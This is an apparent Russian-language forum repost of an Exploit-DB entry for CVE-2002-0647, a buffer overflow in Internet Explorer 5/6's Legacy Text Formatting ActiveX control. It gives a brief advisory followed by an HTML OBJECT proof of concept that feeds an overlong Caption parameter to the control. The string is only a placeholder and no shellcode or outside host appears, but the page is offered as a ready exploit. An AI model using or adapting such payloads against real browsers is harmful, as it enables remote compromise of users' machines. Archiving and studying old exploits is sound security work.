Exploit Microsoft Internet Explorer 5/6 Legacy Text Formatting - ActiveX Component Buffer Overflow

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
21748
Проверка EDB
  1. Пройдено
Автор
MARK LITCHFIELD
Тип уязвимости
REMOTE
Платформа
WINDOWS
CVE
cve-2002-0647
Дата публикации
2002-08-22
Код:
source: https://www.securityfocus.com/bid/5558/info

A buffer overflow vulnerability has been reported in Microsoft Internet Explorer's Legacy Text Formatting ActiveX control. The Legacy Text Formatting ActiveX control is used by Internet Explorer to display specially formatted text. Reportedly, the ActiveX control is vulnerable to a buffer overflow condition.

Microsoft has reported that the specific ActiveX control is not installed by default as part of Internet Explorer. The control, however, will be downloaded as it is needed from a Microsoft Web Site.

The control was retained by Microsoft for backward compatibility and has since been removed from the Web site. 

<OBJECT
classid="clsid:99B42120-6EC7-11CF-A6C7-00AA00A47DD2"
id=lblActiveLbl
width=250
height=250
align=left
hspace=20
vspace=0
>
<PARAM NAME="Angle" VALUE="90">
<PARAM NAME="Alignment" VALUE="4">
<PARAM NAME="BackStyle" VALUE="0">
<PARAM NAME="Caption" VALUE="long char string">
<PARAM NAME="FontName" VALUE="NGS Software Font">
<PARAM NAME="FontSize" VALUE="50">
<PARAM NAME="FontBold" VALUE="1">
<PARAM NAME="FrColor" VALUE="0">
</OBJECT>
 
Источник
www.exploit-db.com

Похожие темы